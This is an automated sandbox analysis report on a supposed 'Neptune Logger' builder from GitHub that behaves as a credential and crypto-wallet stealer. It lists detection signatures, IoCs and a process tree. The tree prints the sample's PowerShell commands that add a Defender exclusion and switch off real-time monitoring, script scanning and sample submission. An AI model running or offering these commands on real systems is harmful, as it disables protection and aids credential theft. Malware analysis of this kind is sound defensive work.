hxxps://github[.]com/NeptuneLogger/Netpune-Logger/tree/main/Neptune-Logger/Neptune%20Logger

Analysis

max time kernel
70s
max time network
68s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
19/05/2024, 23:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/NeptuneLogger/Netpune-Logger/tree/main/Neptune-Logger/Neptune%20Logger

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6340	powershell.exe
5536	powershell.exe
5620	powershell.exe
1948	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Neptune Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 7 IoCs

pid	Process
5592	Neptune Builder.exe
5708	Neptune Builder.exe
5792	Neptune Builder.exe
5920	Neptune Builder.exe
4420	bound.exe
6596	Camera.exe
5224	rar.exe

Loads dropped DLL 35 IoCs

pid	Process
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5920	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe
5792	Neptune Builder.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000234f3-238.dat	upx
behavioral1/memory/5792-252-0x00007FFCDC7B0000-0x00007FFCDCD99000-memory.dmp	upx
behavioral1/memory/5920-258-0x00007FFCDC1C0000-0x00007FFCDC7A9000-memory.dmp	upx
behavioral1/files/0x00070000000234f7-260.dat	upx
behavioral1/files/0x0007000000023509-275.dat	upx
behavioral1/files/0x0007000000023502-277.dat	upx
behavioral1/files/0x00070000000234fe-279.dat	upx
behavioral1/files/0x000700000002350e-283.dat	upx
behavioral1/files/0x0007000000023504-284.dat	upx
behavioral1/files/0x0007000000023506-288.dat	upx
behavioral1/files/0x000700000002350a-292.dat	upx
behavioral1/memory/5920-301-0x00007FFCDC130000-0x00007FFCDC153000-memory.dmp	upx
behavioral1/memory/5920-302-0x00007FFCDBFB0000-0x00007FFCDC127000-memory.dmp	upx
behavioral1/memory/5920-306-0x00007FFCDBEC0000-0x00007FFCDBF78000-memory.dmp	upx
behavioral1/files/0x00070000000234ed-312.dat	upx
behavioral1/memory/5792-317-0x00007FFCDBAC0000-0x00007FFCDBAE3000-memory.dmp	upx
behavioral1/memory/5792-321-0x00007FFCDBB10000-0x00007FFCDBB3D000-memory.dmp	upx
behavioral1/memory/5920-322-0x00007FFCDB920000-0x00007FFCDB934000-memory.dmp	upx
behavioral1/memory/5792-325-0x00007FFCDB7A0000-0x00007FFCDB7CE000-memory.dmp	upx
behavioral1/memory/5792-324-0x00007FFCDB7D0000-0x00007FFCDB7DD000-memory.dmp	upx
behavioral1/memory/5792-326-0x00007FFCDB360000-0x00007FFCDB6D8000-memory.dmp	upx
behavioral1/memory/5792-328-0x00007FFCDB6E0000-0x00007FFCDB798000-memory.dmp	upx
behavioral1/memory/5792-331-0x00007FFCDC7B0000-0x00007FFCDCD99000-memory.dmp	upx
behavioral1/memory/5792-330-0x00007FFCDB330000-0x00007FFCDB33D000-memory.dmp	upx
behavioral1/memory/5792-329-0x00007FFCDB340000-0x00007FFCDB354000-memory.dmp	upx
behavioral1/memory/5792-323-0x00007FFCDB7E0000-0x00007FFCDB7F9000-memory.dmp	upx
behavioral1/files/0x0007000000023514-332.dat	upx
behavioral1/memory/4420-333-0x0000000000400000-0x0000000000603000-memory.dmp	upx
behavioral1/memory/5920-320-0x00007FFCDB800000-0x00007FFCDB91C000-memory.dmp	upx
behavioral1/memory/5920-319-0x00007FFCDDE10000-0x00007FFCDDE1D000-memory.dmp	upx
behavioral1/memory/5792-318-0x00007FFCDB940000-0x00007FFCDBAB7000-memory.dmp	upx
behavioral1/memory/5792-316-0x00007FFCDBAF0000-0x00007FFCDBB09000-memory.dmp	upx
behavioral1/memory/4420-381-0x0000000000400000-0x0000000000603000-memory.dmp	upx
behavioral1/memory/5920-308-0x00007FFCDBB40000-0x00007FFCDBEB8000-memory.dmp	upx
behavioral1/memory/5792-386-0x00007FFCEE020000-0x00007FFCEE030000-memory.dmp	upx
behavioral1/memory/5792-408-0x00007FFCDB360000-0x00007FFCDB6D8000-memory.dmp	upx
behavioral1/memory/5792-407-0x00007FFCDB7A0000-0x00007FFCDB7CE000-memory.dmp	upx
behavioral1/memory/5792-406-0x00007FFCDB7D0000-0x00007FFCDB7DD000-memory.dmp	upx
behavioral1/memory/5792-405-0x00007FFCDB7E0000-0x00007FFCDB7F9000-memory.dmp	upx
behavioral1/memory/5792-404-0x00007FFCDB940000-0x00007FFCDBAB7000-memory.dmp	upx
behavioral1/memory/5792-403-0x00007FFCDBAC0000-0x00007FFCDBAE3000-memory.dmp	upx
behavioral1/memory/5792-402-0x00007FFCDBAF0000-0x00007FFCDBB09000-memory.dmp	upx
behavioral1/memory/5792-401-0x00007FFCDBB10000-0x00007FFCDBB3D000-memory.dmp	upx
behavioral1/memory/5792-400-0x00007FFCE9250000-0x00007FFCE925F000-memory.dmp	upx
behavioral1/memory/5792-396-0x00007FFCDB6E0000-0x00007FFCDB798000-memory.dmp	upx
behavioral1/memory/5792-387-0x00007FFCDDA50000-0x00007FFCDDA73000-memory.dmp	upx
behavioral1/memory/5920-588-0x00007FFCDC1C0000-0x00007FFCDC7A9000-memory.dmp	upx
behavioral1/memory/5920-305-0x00007FFCDBF80000-0x00007FFCDBFAE000-memory.dmp	upx
behavioral1/memory/5920-304-0x00007FFCDF2D0000-0x00007FFCDF2DD000-memory.dmp	upx
behavioral1/memory/5920-303-0x00007FFCDDA30000-0x00007FFCDDA49000-memory.dmp	upx
behavioral1/memory/5920-300-0x00007FFCDF1E0000-0x00007FFCDF1F9000-memory.dmp	upx
behavioral1/memory/5920-299-0x00007FFCDC160000-0x00007FFCDC18D000-memory.dmp	upx
behavioral1/memory/5920-298-0x00007FFCE16F0000-0x00007FFCE16FF000-memory.dmp	upx
behavioral1/memory/5920-297-0x00007FFCDC190000-0x00007FFCDC1B3000-memory.dmp	upx
behavioral1/memory/5920-296-0x00007FFCE6B50000-0x00007FFCE6B60000-memory.dmp	upx
behavioral1/files/0x0007000000023508-294.dat	upx
behavioral1/files/0x000700000002350d-287.dat	upx
behavioral1/files/0x00070000000234ff-273.dat	upx
behavioral1/memory/5792-270-0x00007FFCE9250000-0x00007FFCE925F000-memory.dmp	upx
behavioral1/memory/5792-269-0x00007FFCDDA50000-0x00007FFCDDA73000-memory.dmp	upx
behavioral1/memory/5792-268-0x00007FFCEE020000-0x00007FFCEE030000-memory.dmp	upx
behavioral1/memory/5920-871-0x00007FFCDBB40000-0x00007FFCDBEB8000-memory.dmp	upx
behavioral1/memory/5920-873-0x00007FFCDC1C0000-0x00007FFCDC7A9000-memory.dmp	upx
behavioral1/memory/5920-891-0x00007FFCDDA30000-0x00007FFCDDA49000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
61	raw.githubusercontent.com
62	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
75	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5360	WMIC.exe
5580	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
5684	tasklist.exe
5288	tasklist.exe
5760	tasklist.exe
5532	tasklist.exe
7108	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6312	systeminfo.exe

Kills process with taskkill 20 IoCs

evasion

pid	Process
2024	taskkill.exe
1808	taskkill.exe
6956	taskkill.exe
6288	taskkill.exe
6232	taskkill.exe
6696	taskkill.exe
7024	taskkill.exe
2096	taskkill.exe
5576	taskkill.exe
4356	taskkill.exe
6668	taskkill.exe
7056	taskkill.exe
6184	taskkill.exe
6488	taskkill.exe
4352	taskkill.exe
3444	taskkill.exe
4492	taskkill.exe
6324	taskkill.exe
6832	taskkill.exe
5224	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5564	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 978306.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
1512	msedge.exe
1512	msedge.exe
2712	msedge.exe
2712	msedge.exe
3860	identity_helper.exe
3860	identity_helper.exe
5476	msedge.exe
5476	msedge.exe
5536	powershell.exe
5536	powershell.exe
5620	powershell.exe
5620	powershell.exe
5516	powershell.exe
5516	powershell.exe
5536	powershell.exe
5620	powershell.exe
5516	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
5812	powershell.exe
5812	powershell.exe
5812	powershell.exe
6340	powershell.exe
6340	powershell.exe
6340	powershell.exe
5280	powershell.exe
5280	powershell.exe
5280	powershell.exe
5360	powershell.exe
5360	powershell.exe
5360	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	5572	WMIC.exe
Token: SeSecurityPrivilege	5572	WMIC.exe
Token: SeTakeOwnershipPrivilege	5572	WMIC.exe
Token: SeLoadDriverPrivilege	5572	WMIC.exe
Token: SeSystemProfilePrivilege	5572	WMIC.exe
Token: SeSystemtimePrivilege	5572	WMIC.exe
Token: SeProfSingleProcessPrivilege	5572	WMIC.exe
Token: SeIncBasePriorityPrivilege	5572	WMIC.exe
Token: SeCreatePagefilePrivilege	5572	WMIC.exe
Token: SeBackupPrivilege	5572	WMIC.exe
Token: SeRestorePrivilege	5572	WMIC.exe
Token: SeShutdownPrivilege	5572	WMIC.exe
Token: SeDebugPrivilege	5572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5572	WMIC.exe
Token: SeRemoteShutdownPrivilege	5572	WMIC.exe
Token: SeUndockPrivilege	5572	WMIC.exe
Token: SeManageVolumePrivilege	5572	WMIC.exe
Token: 33	5572	WMIC.exe
Token: 34	5572	WMIC.exe
Token: 35	5572	WMIC.exe
Token: 36	5572	WMIC.exe
Token: SeDebugPrivilege	5684	tasklist.exe
Token: SeDebugPrivilege	5536	powershell.exe
Token: SeDebugPrivilege	5620	powershell.exe
Token: SeIncreaseQuotaPrivilege	5572	WMIC.exe
Token: SeSecurityPrivilege	5572	WMIC.exe
Token: SeTakeOwnershipPrivilege	5572	WMIC.exe
Token: SeLoadDriverPrivilege	5572	WMIC.exe
Token: SeSystemProfilePrivilege	5572	WMIC.exe
Token: SeSystemtimePrivilege	5572	WMIC.exe
Token: SeProfSingleProcessPrivilege	5572	WMIC.exe
Token: SeIncBasePriorityPrivilege	5572	WMIC.exe
Token: SeCreatePagefilePrivilege	5572	WMIC.exe
Token: SeBackupPrivilege	5572	WMIC.exe
Token: SeRestorePrivilege	5572	WMIC.exe
Token: SeShutdownPrivilege	5572	WMIC.exe
Token: SeDebugPrivilege	5572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5572	WMIC.exe
Token: SeRemoteShutdownPrivilege	5572	WMIC.exe
Token: SeUndockPrivilege	5572	WMIC.exe
Token: SeManageVolumePrivilege	5572	WMIC.exe
Token: 33	5572	WMIC.exe
Token: 34	5572	WMIC.exe
Token: 35	5572	WMIC.exe
Token: 36	5572	WMIC.exe
Token: SeDebugPrivilege	5516	powershell.exe
Token: SeIncreaseQuotaPrivilege	5580	WMIC.exe
Token: SeSecurityPrivilege	5580	WMIC.exe
Token: SeTakeOwnershipPrivilege	5580	WMIC.exe
Token: SeLoadDriverPrivilege	5580	WMIC.exe
Token: SeSystemProfilePrivilege	5580	WMIC.exe
Token: SeSystemtimePrivilege	5580	WMIC.exe
Token: SeProfSingleProcessPrivilege	5580	WMIC.exe
Token: SeIncBasePriorityPrivilege	5580	WMIC.exe
Token: SeCreatePagefilePrivilege	5580	WMIC.exe
Token: SeBackupPrivilege	5580	WMIC.exe
Token: SeRestorePrivilege	5580	WMIC.exe
Token: SeShutdownPrivilege	5580	WMIC.exe
Token: SeDebugPrivilege	5580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5580	WMIC.exe
Token: SeRemoteShutdownPrivilege	5580	WMIC.exe
Token: SeUndockPrivilege	5580	WMIC.exe
Token: SeManageVolumePrivilege	5580	WMIC.exe
Token: 33	5580	WMIC.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 3680	2712	msedge.exe	82
PID 2712 wrote to memory of 3680	2712	msedge.exe	82
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 2084	2712	msedge.exe	83
PID 2712 wrote to memory of 1512	2712	msedge.exe	84
PID 2712 wrote to memory of 1512	2712	msedge.exe	84
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85
PID 2712 wrote to memory of 1232	2712	msedge.exe	85

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6756	attrib.exe
6916	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/NeptuneLogger/Netpune-Logger/tree/main/Neptune-Logger/Neptune%20Logger
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffceff246f8,0x7ffceff24708,0x7ffceff24718
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
  2⤵
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
  2⤵
  PID:1232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:8
  2⤵
  PID:2432
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  2⤵
  PID:1504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:4132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5548 /prefetch:8
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:5144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
  2⤵
  PID:5152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6500 /prefetch:8
  2⤵
  PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,16432884937431910049,8782865786126538762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5476
- C:\Users\Admin\Downloads\Neptune Builder.exe
  "C:\Users\Admin\Downloads\Neptune Builder.exe"
  2⤵
  - Executes dropped EXE
  PID:5592
- - C:\Users\Admin\Downloads\Neptune Builder.exe
    "C:\Users\Admin\Downloads\Neptune Builder.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5792
- C:\Users\Admin\Downloads\Neptune Builder.exe
  "C:\Users\Admin\Downloads\Neptune Builder.exe"
  2⤵
  - Executes dropped EXE
  PID:5708
- - C:\Users\Admin\Downloads\Neptune Builder.exe
    "C:\Users\Admin\Downloads\Neptune Builder.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Neptune Builder.exe'"
      4⤵
      PID:3176
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Neptune Builder.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
